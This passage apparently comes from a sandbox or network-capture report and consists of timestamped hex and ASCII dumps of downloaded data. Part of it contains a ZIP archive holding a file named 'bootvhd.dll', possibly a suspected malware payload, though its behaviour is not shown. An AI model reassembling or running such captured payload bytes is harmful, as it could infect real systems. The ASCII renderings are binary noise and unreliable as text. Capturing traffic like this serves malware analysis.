ee c8 38 4b 5f 46 ba f1 cb 88 38 0a 6b 7a 17 6a 02 2f a5 f8 b3 ef 82 5e 03 10 58 28 c5 9f 7f 17 f4 14 80 c0 3a 29 fe 62 08 48 a7 ef e7 8a 9b 39 8b 99 28 f1 6a 19 e4 1a 3d 08 81 e0 bb 8d
                                                                                                                      Data Ascii: &W(~Gx0t$68N!~@(^c<6aFt:N%:R!kjLhIa8GN8x<G0fl{!!Y}44@MZ4rr0mf__9)($wL`B+8K_F8kzj/^X(:)bH9(j=
                                                                                                                      2023-09-07 16:19:24 UTC2047INData Raw: 58 f9 6f 00 e5 7f 17 62 60 63 a7 a3 4d 85 b5 21 2b da 59 f7 37 c4 8a 75 5d 91 bd 70 99 5e f1 6f ba b8 25 06 96 57 fa d9 48 cb 2b 8f be c5 66 af b6 6e bf 16 de 45 7b 65 2d aa f2 b7 d8 1e 28 00 a9 db 7c 08 9a a0 e7 47 9b 1c 60 cd 5f eb 46 5c 5e 57 04 aa 59 ba 12 49 bf be 71 7b 1a de d0 e2 2e 41 b2 7e a7 12 59 6f 9e e3 64 c5 01 55 72 81 35 c2 7e a4 0b 9b ed c8 90 db bf d1 d1 d5 e9 b3 35 18 27 5b 07 27 ac 91 7e c8 9f 74 81 f8 39 49 17 3d 6e ee 36 4a db bc 6f 38 6a 5a c5 b1 d5 bd d0 20 de 40 5c 28 90 be c1 16 8c 01 1d 56 e8 31 f3 4f d0 fd 5f 1a a2 52 14 e4 19 69 96 bf 98 43 35 c4 13 94 ec 5c 27 fe 0b 30 a9 57 79 4c b9 0b a4 29 06 85 30 83 7f 82 7a dc 33 1b c5 0a e7 27 ef 1b 29 7c 55 ea e0 b7 28 c8 61 29 dd 71 1a 2f 5d 08 af 14 10 fe 92 ba 54 8e 8a 96 55 85 fd
                                                                                                                      Data Ascii: Xob`cM!+Y7u]p^o%WH+fnE{e-(|G`_F\^WYIq{.A~YodUr5~5'['~t9I=n6Jo8jZ @\(V1O_RiC5\'0WyL)0z3')|U(a)q/]TU
                                                                                                                      2023-09-07 16:19:24 UTC2054INData Raw: 77 87 16 36 3a e9 d8 0f 9b 87 a9 b7 f0 fc fa aa 53 31 76 9c ce 38 be c8 84 01 dc fc 9d 7c af 44 90 f6 4a f4 19 95 fe b1 9f 38 a9 a6 86 11 83 21 f8 ed 3f 69 a8 cc 7c 95 66 de 70 73 4a c3 a1 47 26 fd 95 3e e2 8e 1a 1c 5c 92 af 53 10 e7 7b 69 7d ba d3 cd 1e fe 07 2d 47 e2 3e c3 c1 a7 3f 47 92 ed 61 0f 9d ff 7c 25 72 11 10 19 d9 da e8 5e a7 cd c5 b0 e6 fe c5 e9 f6 8c 75 e9 76 98 bc e4 99 0a d3 77 bc 02 c1 7d 30 f7 69 dc 11 e1 21 d8 ff b7 22 f2 1d 9d ff 4f 4a b9 fe 9f 95 3a 3d 4c 75 a0 74 42 01 db 79 c4 f6 62 48 eb cc 7a 93 ed d9 34 a0 05 3e 20 f1 3c 0d af cf e1 eb 5b 46 88 ec ac fa 3c 8a 24 48 17 87 fc 37 29 91 e1 ec 0f 53 60 ae b2 15 b8 f3 af b2 e5 f2 71 34 ff ed fd 83 c9 54 61 c4 8c bf 29 dd da 93 6f 8d 03 aa f6 e2 5e 39 f1 1a bc 20 46 29 ec cb 6a 61 69 40
                                                                                                                      Data Ascii: w6:S1v8|DJ8!?i|fpsJG&>\S{i}-G>?Ga|%r^uvw}0i!"OJ:=LutBybHz4> <[F<$H7)S`q4Ta)o^9 F)jai@
                                                                                                                      2023-09-07 16:19:24 UTC2062INData Raw: d7 2d e9 ab a5 8c cd 94 cf 6c 32 0a 72 da 02 f7 62 75 f1 21 a9 86 e2 b9 4a a1 d5 d7 0a d6 8d af b3 3f 62 ad 02 73 8b 29 b4 56 11 d1 94 39 56 93 d1 f5 81 99 d6 d0 8a 44 3b 91 b4 73 0f ae 48 8c b4 ea 2b 12 d7 d2 8a c4 34 63 45 42 b3 e8 2b 12 7c 21 e2 07 e2 16 5c 8d b8 82 56 23 3e 05 58 37 d5 5f cd 79 c1 75 9c 78 97 de 2d 80 43 5d eb f5 75 f4 93 85 4e 5d b0 a1 8f f5 7c cc 97 14 6e 38 8f 06 50 67 bf b1 a4 70 aa 3f b4 a4 40 fa 32 2e cc a0 c0 fc d8 10 bb 09 75 1e e7 53 22 5a 6a 94 00 46 5e 35 d2 fd 01 64 b7 0c 28 4b 82 4a 59 5f 20 21 66 48 29 2f a9 02 93 ff f1 ae fe d0 9a 40 3b 71 f9 d1 7e be 1a c0 fa f5 d5 00 8f 34 b2 fa fc 9d d2 f7 79 12 f5 52 59 0e 3d a3 7d 8f bf 3b 08 19 2e 09 6c 9b a7 ec 62 fd e1 c5 80 9d 3d 03 5a 1d c9 73 b9 ec 7b b2 df 58 10 a0 9a 76 3d
                                                                                                                      Data Ascii: -l2rbu!J?bs)V9VD;sH+4cEB+|!\V#>X7_yux-C]uN]|n8Pgp?@2.uS"ZjF^5d(KJY_ !fH)/@;q~4yRY=};.lb=Zs{Xv=
                                                                                                                      2023-09-07 16:19:24 UTC2070INData Raw: dd 6c 9d 0e ee 87 e0 5e 00 f7 e0 f7 d4 57 94 22 17 ad 06 dd 56 8f 1f 03 51 cf e1 5e 59 53 74 b2 a6 a6 26 2e 4f 58 ce f7 f7 0f 0c e2 09 2e 7c 7b 7f de 87 b8 61 21 0f 37 f6 67 44 8e 81 b2 bd a6 ec 27 6a 2e 8c 32 8e 8a 14 13 5f b5 57 26 75 ce b9 a1 e8 9c 71 0b 40 e1 c6 73 d2 6d 30 fe c1 55 f3 cb 89 55 f3 cb 15 b8 71 fc 32 f0 ca 42 1c 1d 29 2b 33 87 a4 0c e2 e6 3d 8a 5f 66 4a 5b 62 32 be 00 25 25 ca 62 d9 65 b3 5a 76 d5 5b c9 e2 c8 e9 86 b1 d2 54 e8 31 9d a5 f1 15 39 c7 dd 91 f6 ad 6c 65 74 f5 0b fb 6d c7 71 f3 f7 7e db 29 7e 3b 73 e4 c8 c7 0b 40 47 d2 17 11 47 ef 2b 4b cf ef cf 84 ab 40 bb e9 4c ee 8d 27 e5 7b a1 cd 37 1e c3 dd 5c 71 cb c6 fd 34 d9 00 96 c5 56 77 34 c3 f2 bd ae eb 07 ee 1c 97 29 6c 2a 4b 77 ef 2f cb 48 2b dc 57 36 8a e1 50 3f cb 84 2c 77 dc
                                                                                                                      Data Ascii: l^W"VQ^YSt&.OX.|{a!7gD'j.2_W&uq@sm0UUq2B)+3=_fJ[b2%%beZv[T19letmq~)~;s@GG+K@L'{7\q4Vw4)l*Kw/H+W6P?,w
                                                                                                                      2023-09-07 16:19:24 UTC2078INData Raw: 33 d0 20 b6 3a 7d 72 d8 bb 4e 64 3c 4d 41 19 63 2b 1d 5e a9 22 10 aa f5 fa 9b 7c e2 b2 c6 35 a2 53 12 24 6f b3 e8 12 02 b2 24 78 fd 02 a4 6b 09 8b 7e d7 0c 0a c6 c0 5c 78 f6 39 c2 92 20 86 42 81 10 78 cd a9 f8 85 f9 25 c2 3d a9 61 25 25 c2 2c c6 30 61 43 58 7c ac c1 eb 2f 41 44 0d 0e e7 da 06 c0 ca 3d 18 a1 7b 30 46 85 f2 79 fd 6b 1b 30 ff 10 79 31 86 1e d6 8a 62 d0 e1 03 ec dc 1b 12 9d eb 1a 4a 88 a0 5c a7 90 1b 16 72 f3 bf 1a 16 e0 c1 cc a6 01 8d 79 5e 17 81 41 2e 1a 1a b8 4f 13 e8 87 75 12 68 6e c6 ba 0a e5 df ef 71 85 0a bc 2e a4 39 24 3e a6 79 31 0e ab c3 13 08 04 c3 42 1e 24 35 33 1b d6 41 81 50 27 86 9a bd 7e 87 04 d5 28 ac 0c 79 25 b1 ce 13 12 1d ae 61 e3 6b 20 42 d0 e2 01 9f 04 71 82 d3 e1 f3 89 40 93 07 89 10 4a 84 dc 56 8a c3 9a f7 8b ad 92 e0
                                                                                                                      Data Ascii: 3 :}rNd<MAc+^"|5S$o$xk~\x9 Bx%=a%%,0aCX|/AD={0Fyk0y1bJ\ry^A.Ouhnq.9$>y1B$53AP'~(y%ak Bq@JV
                                                                                                                      2023-09-07 16:19:24 UTC2086INData Raw: 8c a4 24 14 40 4b da 00 a8 1d d4 e0 e5 5e c0 90 88 ae 0d 39 2b 75 02 b9 dd 8f 5d 47 33 fb a9 e8 ba dd 9f 54 b7 38 30 9d 01 46 8b 8b 8f 23 5b 34 23 a2 25 ac bf 77 59 ea 72 19 04 d7 0c a1 49 5b a7 50 01 9a 1b 3c d4 87 b4 d5 1a 75 7e 53 5f bc 41 91 2c 8d 30 cf c7 e7 4a a4 5a a0 55 76 e3 ba 3a 9f 77 24 e1 4f a3 b7 b0 3a 48 60 cc 38 66 e2 83 11 4d c0 95 85 9c 7c 73 eb 90 61 d3 30 69 f4 71 56 3e 0d b2 dd 1c 72 28 9c 17 78 0e b9 58 12 93 21 19 c3 9e 97 b2 95 7e 6e ca be 72 c4 43 ec a9 cf 90 20 69 32 5f 30 54 87 a5 61 b5 3a 6b 35 82 67 08 ea cc 2a e9 60 ed b9 9a cf 1d aa fb a4 39 89 21 50 1e 81 66 2a be 1c 12 cd 23 96 93 e6 4b 0c 23 b5 a1 f5 a3 ef 41 57 27 1a 71 66 87 6b 37 f5 e5 34 0c 68 c6 17 e6 bd 61 81 db 56 94 0e b8 54 3d c9 a8 d4 a7 6e 8b 67 36 d2 19 46 99
                                                                                                                      Data Ascii: $@K^9+u]G3T80F#[4#%wYrI[P<u~S_A,0JZUv:w$O:H`8fM|sa0iqV>r(xX!~nrC i2_0Ta:k5g*`9!Pf*#K#AW'qfk74haVT=ng6F
                                                                                                                      2023-09-07 16:19:24 UTC2094INData Raw: 8f 51 2a dc b2 4a 75 df 1b 89 db 4f 2c 14 09 d7 2a 77 75 43 bc 5c 6b d9 9a 27 74 b7 16 34 4c ef a7 ff b1 18 7a a0 08 25 7a 99 f3 ea e6 8d 4b 71 bd e9 53 e8 ab bc 2d 01 da 6c d1 af ad 0b 55 f0 1c 60 51 5f 12 a8 51 a2 a2 6a 75 85 ab 36 9e 87 95 75 d5 15 ab 3c 71 d7 a1 9c 1a cd 1b 96 1d eb 3d 71 2e ba 15 d9 ad 0d d1 c0 aa 20 6f ca 41 c7 84 7f 83 26 b5 5e c8 6d f0 fa d1 e3 f4 85 24 3e c7 18 d7 82 4e e0 92 73 f2 e8 1d 5e 95 ce e0 de 16 ef 29 b8 10 eb fc 41 64 29 22 7c 5c 62 b3 e8 76 3e e7 4f 2b e8 16 31 36 57 af e0 f3 8b 73 6b 3b 57 f3 ca ac dc 67 5d dc 14 6f 5a 3d 89 f5 e1 7e 65 f5 18 d6 8d 3b 68 f5 18 56 94 7b 8b 5d a2 10 f6 d4 31 a0 11 cf 89 17 5c 99 44 b3 73 eb 2a 57 78 c3 72 44 68 e4 45 25 12 e3 65 62 4d b5 03 17 8e 0b f4 be 75 55 b0 5d 18 f6 25 6a 03 83
                                                                                                                      Data Ascii: Q*JuO,*wuC\k't4Lz%zKqS-lU`Q_Qju6u<q=q. oA&^m$>Ns^)Ad)"|\bv>O+16Wsk;Wg]oZ=~e;hV{]1\Ds*WxrDhE%ebMuU]%j
                                                                                                                      2023-09-07 16:19:24 UTC2101INData Raw: 32 a5 ea 52 f6 54 33 aa 15 70 7b 7b c8 af fe 54 30 15 46 0d a3 e2 a8 89 d4 54 2a 83 5a 48 e5 50 67 a8 17 94 05 dd 80 96 e8 70 7a 0c 7d 98 7e 48 bf a1 bf d2 b5 a0 2b 5b 43 15 06 83 5b e9 c4 a6 b3 6b d8 93 ac 03 d7 92 eb cb 0d e4 32 c0 a9 17 72 fb b9 b3 dc 03 4e 8f af c7 87 f0 83 f9 b5 fc 46 be 03 e4 d7 1b 42 35 24 16 07 d0 ea 2e e2 6d e0 eb 91 80 d4 15 c0 c8 6f 81 8f 6b c1 9c 2c 90 97 c8 85 f2 61 c0 69 2b e0 62 09 d8 78 b0 32 42 89 87 fe 5b ac ac 54 f6 2b b7 14 8d 97 9e 8e 96 35 c6 a8 2e aa 8f 5c 51 13 d4 59 45 6f 7f 34 11 4d 55 13 ac 0d cc 5c 90 9a 57 4f 62 67 b1 d5 90 51 a7 13 f3 88 96 64 34 95 05 fa 55 02 ea f5 84 d2 a3 8d 41 bf da d0 f1 aa 72 bf a0 cd 40 9f 86 30 d9 cc 76 66 0f f3 88 79 c5 58 b1 f6 c0 b4 a7 d9 6b a0 e2 21 5c 24 37 0d 3c c9 66 ee 38 77
                                                                                                                      Data Ascii: 2RT3p{{T0FT*ZHPgpz}~H+[C[k2rNFB5$.mok,ai+bx2B[T+5.\QYEo4MU\WObgQd4UAr@0vfyXk!\$7<f8w
                                                                                                                      2023-09-07 16:19:24 UTC2109INData Raw: fa 4a 52 94 2b db 98 6d 06 de 00 63 29 96 63 25 d6 84 db c4 9d 80 2a 07 80 37 99 cb 6f 90 b2 75 bf 17 a6 55 b5 0e 83 44 97 8d 0e a1 1c dc 12 66 d9 81 72 a2 5c 28 77 ca 83 f2 a4 d6 53 fb a9 20 7a 2f 7d 9c be 0f ec 7f 91 69 03 29 13 07 0f bf 93 3f c7 5f e7 bb 8b 3a 2f f0 e3 3d 2e 82 6b 09 22 fb 81 6f b9 4f ba 41 02 19 4d 31 b4 15 63 cf b4 61 ba 33 db c1 ad f0 ec 29 f6 21 70 8f 2b 74 7e 6f f0 26 89 90 12 a6 73 8b b8 00 dd 7b 24 69 55 3f b2 1a 5c 48 3d c2 95 38 4f ec 24 3b 03 d7 bd 02 97 60 04 0a b4 87 7e 4d 8f 01 cf 19 c7 36 82 6c b5 8c 5f cd b7 15 3a 0a 41 c2 6b c1 54 f4 11 a7 49 9a 8c 1f bf af 87 2c 50 33 a4 21 a6 12 5e d0 11 6b c0 c1 6d e2 b6 a9 f9 63 1f 64 c5 23 dc 71 e0 ba b3 90 41 72 f9 21 c2 3c b5 cf 2d 45 52 f7 f7 b3 b5 1a 1b dd f7 ab 11 dd 18 91 4f
                                                                                                                      Data Ascii: JR+mc)c%*7ouUDfr\(wS z/}i)?_:/=.k"oOAM1ca3)!p+t~o&s{$iU?\H=8O$;`~M6l_:AkTI,P3!^kmcd#qAr!<-ERO
                                                                                                                      2023-09-07 16:19:24 UTC2117INData Raw: 9a d3 59 87 78 68 10 36 97 85 e9 e7 f3 9d 25 21 d7 de f5 b5 ef f5 3f be ef cd ce e7 f7 af ef ef 01 ef 03 cf 90 0c 42 08 03 8f 61 10 d2 4b cc e6 21 ff 73 1b 83 27 7f c9 5b f9 e4 50 ce a9 a5 bd 96 ea 53 4b ef 17 1e fd ae b3 75 d7 e3 8f ec da fe 1d e7 c3 db 1f 7b ec 71 d1 f9 d0 0e e7 2e e9 31 e7 a3 8f 39 2b ee ab 73 7e e7 f1 e6 1d ab f2 f2 e6 b9 d2 36 9c f7 79 b5 e6 55 b7 1c 99 79 72 ff 6c d9 91 1d f0 fe 6c f5 ca 23 12 c5 6f 3f 52 83 f8 6d 1d 47 b6 53 99 9b 8f 6c 82 f7 43 79 a6 dc 43 79 b7 d3 f7 c1 65 b7 d2 77 ed a3 0f 0b 68 e7 0f c5 ec e3 09 a9 b6 30 e4 ae c6 73 f7 cc d0 46 08 67 c9 b5 64 11 b2 0d 90 56 93 f6 7c 11 fc d8 67 70 8f 09 db cd 3a 11 72 f5 4d 46 4c fa e3 07 2d b4 8e 14 b1 cf 7e 5f 79 d1 e6 94 08 59 87 c0 20 21 9b b2 67 31 62 84 74 3b c8 ff bd 41
                                                                                                                      Data Ascii: Yxh6%!?BaK!s'[PSKu{q.19+s~6yUyrll#o?RmGSlCyCyewh0sFgdV|gp:rMFL-~_yY !g1bt;A
                                                                                                                      2023-09-07 16:19:24 UTC2125INData Raw: 70 2e f0 e0 72 b3 56 3a ed d8 8f 9d 90 cf 24 1c 3d b4 06 9a cf a0 65 43 61 62 4b 4b 45 f3 cb f6 cb 56 e1 72 fb 57 2a c3 e3 98 a4 69 8e 56 50 83 85 69 9a 3c 14 91 b1 30 b9 40 4d d3 df b1 a3 6e f4 13 33 db 65 62 58 5a 3f 38 ce 7c b7 ab 20 c3 18 19 de c6 e2 7d af d7 82 51 fd 97 40 36 b3 fb 0d 0c 3d f3 bd a2 68 5c cb f7 a5 d4 ce 94 52 cc 9e bb 00 24 f4 49 31 de 63 28 57 a9 fa 4a 5f 07 0a 36 4f 30 31 76 6b dd cd 1b f1 22 e7 1e 42 d5 1e 4c 51 12 c0 66 f6 94 0e 46 4a 9f 24 a9 36 00 88 07 d7 3f 62 94 c1 66 8f 09 20 a5 5a 9d c2 87 c7 12 bc 68 62 59 9b 55 e8 bd db 6d 62 dc 24 43 39 ec 8a e6 7b 1e 47 d5 13 1e ca af 49 53 ae 7c 61 b3 e0 a8 7c 3e 71 92 bd c3 f9 44 94 74 3e b1 f7 65 e8 90 84 53 86 0e 6e 91 db 74 d6 5c ae 28 b0 92 23 0a ab 18 f9 81 34 45 d2 b0 60 4e c2
                                                                                                                      Data Ascii: p.rV:$=eCabKKEVrW*iVPi<0@Mn3ebXZ?8| }Q@6=h\R$I1c(WJ_6O01vk"BLQfFJ$6?bf ZhbYUmb$C9{GIS|a|>qDt>eSnt\(#4E`N
                                                                                                                      2023-09-07 16:19:24 UTC2133INData Raw: ea 6d 14 43 62 92 d4 c3 20 55 59 a5 15 11 ab 43 a9 49 1a 79 a4 de 55 ae 62 2b f2 ab ea a0 db a9 3f 21 6d 89 61 e4 08 4a 7b 65 38 04 6a 11 48 f2 a6 55 c0 fa 44 71 3e aa 52 94 d2 92 b4 55 76 29 fa 9f 54 66 05 e7 2c c5 fa 2d e1 36 6f 06 61 01 0c 6c 03 84 98 71 51 c0 b6 9f a5 b2 0c 1b 09 23 6e c4 8d b8 11 37 e2 fe cf b8 ec 7b 8c d4 d9 59 43 b6 93 6f ee f9 be 1d 65 95 bd 32 bd b2 c4 c2 72 9b 16 ea 70 9f 04 ab 03 d1 e9 6d d5 75 f3 13 57 d9 6b ed 0e 96 3c 66 3a 57 d9 4b ca 1c 76 b2 05 83 f4 34 96 b5 57 d6 90 4d 41 31 2a 67 ba ea cd ba e2 ca 12 5d 5d 55 49 c8 ad 74 51 e1 af e6 58 5d d1 66 58 26 74 a8 5f ac b2 6f 09 19 8e 03 0f ba b4 9a 1a dd a0 06 50 a2 93 b6 3d 15 db e6 22 41 50 c8 74 d3 4b 48 59 58 26 6c 1e 61 43 05 09 c3 01 b0 83 08 b9 1d 2e 94 3e 1c 17 00 77
                                                                                                                      Data Ascii: mCb UYCIyUb+?!maJ{e8jHUDq>RUv)Tf,-6oalqQ#n7{YCoe2rpmuWk<f:WKv4WMA1*g]]UItQX]fX&t_oP="APtKHYX&laC.>w
                                                                                                                      2023-09-07 16:19:24 UTC2140INData Raw: 59 99 77 c6 9f 3b f7 73 e1 d0 c1 6f f1 f3 9d d6 d0 cd c5 a4 a5 49 a4 99 73 6c d2 e3 62 10 6f 8f 40 3f d8 71 3b f4 d5 62 e8 5b 2d 62 a0 e3 dc 0e ea 2e a0 dd 75 1a 5a 66 52 7a 60 16 2e 5c 18 17 33 17 f4 39 03 c6 0a 1c af f5 f3 16 29 a9 48 af 98 c3 26 5e eb ab 45 1a 37 dd ed e3 51 91 86 56 9b 98 8c 8c de 31 84 c6 b7 5b 4c 40 b4 f1 8a c9 97 3a 3b 58 b7 ec eb 3a 2e ac db f4 75 5f 7b 58 47 07 83 b4 53 7a ea 1c c8 31 d2 35 e1 02 19 17 58 60 b6 e4 b0 a0 6e 2f ad a7 8e 1c 83 03 f9 ff 2d cf 14 fb fb 5d cc dc ca bc 29 b8 e3 0f 79 5d 8a 20 57 e1 a7 01 76 20 d4 41 44 a3 ac 31 50 e6 c2 10 81 59 05 04 4b e3 95 0b c1 0a ca 8b b3 22 88 c1 b0 4e 21 f8 3d 44 a4 7c 01 ea 92 0c 66 11 4d 8a 9c db 49 88 42 70 fb fd 1e 91 da 94 1e 85 b0 22 e5 c5 d9 7a 45 80 de 62 95 b5 42 d0 29
                                                                                                                      Data Ascii: Yw;soIslbo@?q;b[-b.uZfRz`.\39)H&^E7QV1[L@:;X:.u_{XGSz15X`n/-])y] Wv AD1PYK"N!=D|fMIBp"zEbB)
                                                                                                                      2023-09-07 16:19:24 UTC2148INData Raw: c4 10 22 18 05 fe 32 a8 05 64 9b 54 e2 13 51 46 7e 8b a7 94 b9 ac 03 ce d7 8b 6e 41 9b 48 93 5a c2 63 13 e0 70 3c 50 e2 16 58 e3 7e da ef c3 10 37 89 4b 84 1b fc 9e ce 07 82 42 e4 b4 a8 c6 10 97 bb 9b 3a 08 3d 00 69 4a 76 6c 27 f4 00 68 15 d1 0e 20 5b 00 1c e8 83 9b c1 c3 97 6c 94 f0 a0 93 2b a5 8d 87 3d b4 6b e9 41 27 22 e9 44 99 b6 e9 27 18 06 3f a3 19 de c7 41 a5 5b b7 10 92 26 23 07 58 d0 46 1c 3d 05 c6 a2 f3 7c e8 d2 4c 5c 04 65 49 ae 86 a2 06 58 bd a1 4c 61 1e 0e 09 c2 c3 1b 65 8f 49 49 6a e2 61 52 11 4e 57 05 71 6b 79 e9 28 73 7d 19 1e de c2 b3 df 44 84 37 4a 79 84 b4 05 67 1c 52 39 13 c1 74 b0 a6 40 98 e8 bc 4c ba 74 38 1e 02 a5 c0 90 67 2b 1d 80 f3 c8 a3 3a 9e 18 95 ea 1d a1 e1 0b 51 95 11 cf 4e a2 43 8a d0 11 0a ee ac 10 d3 0b 55 85 ba b9 1f a8
                                                                                                                      Data Ascii: "2dTQF~nAHZcp<PX~7KB:=iJvl'h [l+=kA'"D'?A[&#XF=|L\eIXLaeIIjaRNWqky(s}D7JygR9t@Lt8g+:QNCU
                                                                                                                      2023-09-07 16:19:24 UTC2156INData Raw: d1 83 ea a5 bf a4 49 26 4f 9f e7 3a f1 f0 ed f9 e1 9e b3 b9 c6 74 9f c3 2e bf 08 cb 96 1e ab f3 90 b4 0a d7 1a 33 df 26 3c ab 9b 78 9d c2 0d 2a 96 3c 6a b8 fa db fe b8 4b 8b 09 32 77 fc 5f 50 4b 03 04 14 00 00 00 08 00 71 6c 8c 56 0d 7d 68 f3 5a dc 00 00 40 8b 01 00 0b 00 00 00 62 6f 6f 74 76 68 64 2e 64 6c 6c ec 5c 7b 54 53 c7 d6 9f 93 04 88 88 72 d4 20 a8 a8 41 63 45 a5 48 05 2d 0a da 40 48 42 85 68 20 90 80 1a 90 f7 a3 2a 08 09 e0 03 15 8f a9 1c c7 54 5b 6b 6b b5 5a 5f b4 5a ab ad d6 56 7c 54 03 5a 11 ab f5 55 91 6a b5 f8 8e 82 16 85 4a e4 46 cf 9d 39 01 45 ed bd 5d df ba eb 5b f7 5b eb cb 4f c6 99 33 67 ef 3d 7b 66 3f 66 fe c8 1c c5 a4 e5 80 0b 00 e0 a1 c2 30 00 94 03 1b c4 e0 ef 51 87 4a d7 fe fb ba 82 dd 9d 4e 7a 95 13 91 27 bd 62 32 b3 f2 85 b9 79
                                                                                                                      Data Ascii: I&O:t.3&<x*<jK2w_PKqlV}hZ@bootvhd.dll\{TSr AcEH-@HBh *T[kkZ_ZV|TZUjJF9E][[O3g={f?f0QJNz'b2y
                                                                                                                      2023-09-07 16:19:24 UTC2164INData Raw: 54 28 b5 6a 72 9f 6b 85 23 3d 98 02 f5 a7 e9 6a 12 22 fe ba ae 77 1b 36 24 2f 73 2c 30 9e 64 0b 4f 98 60 58 0b e0 d7 2c 2f 71 a4 c1 75 16 7c e5 00 b6 55 41 42 a4 9d 36 74 7c bd 3a 78 07 de b7 96 d4 18 e0 13 07 dc 66 e2 1a e3 f4 4e d0 03 cd 63 2b 60 c6 9a ac 65 6c 89 c3 e6 3e 68 f9 69 97 22 c6 38 46 e9 97 44 e9 4c 83 df 02 70 9d a4 e6 c1 87 d9 50 38 38 4d c5 7d 6f 83 ca 6d 92 01 e8 fb dd 70 1f 87 02 40 9c 82 a9 6d 24 78 1b db 81 6b 03 70 7f 3d e0 1d d8 eb c1 6b 58 7b 75 32 ea 6c d5 e0 74 5d a3 27 6e c5 12 95 14 7a 07 b5 79 18 d7 c0 c3 fe 24 c5 f5 24 9d f5 ad 53 bf a6 e7 86 97 9a f7 ee 80 7a 38 d8 fa 24 cb cc 82 4f 6f 1f 98 f4 dd d9 29 57 ea ba cd d8 51 d8 bf 52 02 f3 2e 91 f2 78 b6 35 2b 89 e3 e2 da ee 04 d2 70 f3 a8 e1 c6 83 47 bc e2 99 97 80 8c f4 dc d8
                                                                                                                      Data Ascii: T(jrk#=j"w6$/s,0dO`X,/qu|UAB6t|:xfNc+`el>hi"8FDLpP88M}omp@m$xkp=kX{u2lt]'nzy$$Sz8$Oo)WQR.x5+pG
                                                                                                                      2023-09-07 16:19:24 UTC2172INData Raw: 0b 03 09 38 fb a4 07 6d 25 35 26 d9 bb 44 5a 9c e6 ab 7e 09 24 9c 12 76 20 92 6f 47 ec ab e4 19 c8 f6 b7 06 b0 26 9d d8 1f f1 55 af 86 37 6a 12 a0 e6 9b e9 99 01 9f 2d d0 9f 2d c3 67 46 f8 9c c2 20 2a bc fe 35 d4 9e 83 8f 9f c1 c7 06 f8 34 8a 6c 54 f2 72 79 bb 2d 89 6c 61 2f 52 1c 24 76 00 ab 4b 2b ad 76 e0 7b 3c 3b a2 74 73 b1 33 a6 eb 03 65 f2 d3 48 de 70 04 d8 3f f3 0d 3f 83 31 fc 6c 07 45 db b8 4a 13 61 53 40 a8 45 8f a8 bc c4 2b e5 d7 f8 7c b7 85 1a cb 9a df 46 5b 78 14 b7 05 13 bd ff 9b 31 da 7f f7 c0 fe d3 1a 01 76 65 1f 2e 05 eb 2d 93 f7 bc a7 4b 40 62 27 0a 30 86 89 40 72 1f d3 fb 07 35 69 5d 20 5d 3a d4 e9 53 fe 87 9f ac 93 2a f3 3f 22 98 1c ec 44 40 7e 2c 7d cf 85 df 02 43 b7 c8 66 bc dc dc 64 e7 82 89 7b c6 60 30 aa 90 26 2d 99 95 29 2f b5 05
                                                                                                                      Data Ascii: 8m%5&DZ~$v oG&U7j--gF *54lTry-la/R$vK+v{<;ts3eHp??1lEJaS@E+|F[x1ve.-K@b'0@r5i] ]:S*?"D@~,}Cfd{`0&-)/
                                                                                                                      2023-09-07 16:19:24 UTC2179INData Raw: 1a 80 81 e0 b4 61 a6 b1 43 72 32 bb 4f 5c 55 01 08 34 1b f6 85 b4 70 6b a1 ea cd ce 77 5f 14 3e c1 28 46 4d c3 52 6d 50 17 66 9f d8 4f c2 6c e2 c7 e3 c2 ec 02 74 99 3e 1a fe d8 0c f2 6c 42 5c 9e 95 aa b2 50 96 9d b1 43 17 c1 f8 c9 1a 32 e2 73 0a 78 e2 43 1b ec b2 1e 19 0f 3a 84 06 5e 05 41 77 fb 64 d9 f6 6a d4 30 6f a5 e3 b7 8a 79 52 c5 7c a9 22 5b f9 e7 47 aa 4a cc e9 ca a0 bc 34 4d 0f b0 67 d7 d1 df ba 84 f8 0e 58 93 a0 73 a2 4b 34 46 56 87 fd db fb 3a 97 38 52 07 df d2 18 68 bb 2b 1f be 72 e3 57 46 57 05 5c 66 26 50 e0 21 02 60 3c 39 7a fc 34 4a 61 d2 83 bc 34 bb ad 6f 7d 12 32 24 14 cf 8c 18 d5 18 0d 44 d2 c7 02 1b 30 30 31 c6 c7 2b 4e 41 93 81 0d 1c 7b b6 59 33 25 c0 a8 ba ca 29 05 c8 e2 7f 62 09 89 6b 68 e1 4e 87 4b ff 4d c4 2f 4e f8 f4 57 c4 ff 6c
                                                                                                                      Data Ascii: aCr2O\U4pkw_>(FMRmPfOlt>lB\PC2sxC:^Awdj0oyR|"[GJ4MgXsK4FV:8Rh+rWFW\f&P!`<9z4Ja4o}2$D001+NA{Y3%)bkhNKM/NWl
                                                                                                                      2023-09-07 16:19:24 UTC2187INData Raw: a8 3b f4 0c cd 3e c6 46 2d 2f 5d b0 85 3f b5 b9 f7 63 90 75 77 93 79 72 c2 98 fc c2 9b e3 01 f6 29 6d 03 23 7e ed 68 f8 33 73 f8 14 9f 02 7b ce 33 26 67 1f 76 0e 30 4b 5e eb fe 60 7d f3 26 64 dd 96 26 48 45 e6 60 5a 2c e3 de 51 60 98 34 26 0e 58 b7 00 0f dc 0a 71 6f 1f 12 f7 b6 df dd 1b 9c a3 e7 15 3e a8 dc cc d3 c8 6b 99 45 e3 5a d1 f1 9a 7f dd 39 90 a7 25 5e c7 1c 53 c9 c0 3d 0d 18 9e d6 78 27 78 d7 1b 5d 08 ec 9b f3 86 a5 fc 96 de e6 0f 93 a5 ab 3b 97 ea 9c 5b c0 a0 55 a2 f7 83 98 64 8d 6d 3b 20 2d 45 b6 8d 9e 42 fd d1 5f d2 69 60 9c 73 d2 5d 5f 10 e5 be 2f 09 43 92 30 8c 4a ce 17 57 d1 4c 77 72 5f 9b e9 85 34 d3 eb 79 36 14 fd 11 1a 75 ed 07 2c a2 03 e9 3d aa 4a f1 eb 4d a8 16 1f 52 6b af 00 d4 9b e3 e1 48 17 b0 6d b8 1b 71 4a 60 db f3 3f 73 02 72 3f
                                                                                                                      Data Ascii: ;>F-/]?cuwyr)m#~h3s{3&gv0K^`}&d&HE`Z,Q`4&Xqo>kEZ9%^S=x'x];[Udm; -EB_i`s]_/C0JWLwr_4y6u,=JMRkHmqJ`?sr?
